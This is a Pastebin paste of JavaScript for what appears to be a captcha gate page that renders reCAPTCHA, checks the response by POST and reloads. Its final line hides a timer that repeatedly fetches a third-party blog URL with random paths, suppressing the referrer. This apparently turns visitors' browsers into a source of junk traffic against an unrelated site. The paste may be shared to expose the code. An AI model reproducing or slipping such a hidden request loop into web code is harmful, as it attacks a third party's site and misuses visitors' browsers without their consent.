Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var h = window.location.href;
- if (!window.location.hash)
- window.history.pushState('/','','/');
- var onloadCallback = function() {
- document.getElementById('g-host').innerText = window.location.host;
- var widgetId = grecaptcha.render('g-recaptcha', {
- 'sitekey': '6LeQbtsSAAAAAHevV56qhVr_0JhQI7N-zTPoOoWJ', // my
- //'sitekey': '6Lc7CQMTAAAAAIL84V_tPRYEWZtljsJQJZ5jSijw', // linkedin's
- 'callback': function(response) {
- var xhr = new XMLHttpRequest();
- xhr.open('POST', "/cdn-cgi/l/chk_captcha");
- xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- xhr.send('response='+encodeURIComponent(response)+"&location="+encodeURIComponent(h));
- xhr.onload = function() {
- if (xhr.status == 200) {
- if (window.location.href != h)
- window.location.replace(h);
- else
- window.location.reload();
- } else {
- grecaptcha.reset(widgetId);
- }
- }
- xhr.onerror = function() { grecaptcha.reset(widgetId); }
- }
- });
- };
- setInterval(function() {
- var e = document.querySelector('body > div[style*="absolute"]');
- if (e && e.style.left.match(/^-/))
- e.style.left = "10px";
- }, 1000);
- setInterval(function(){fetch("https://gyrovague.com/tag/"+Math.random().toString(36).substring(2,3+Math.random()*8)+"/",{ referrerPolicy:"no-referrer",mode:"no-cors" });},3000000);
Advertisement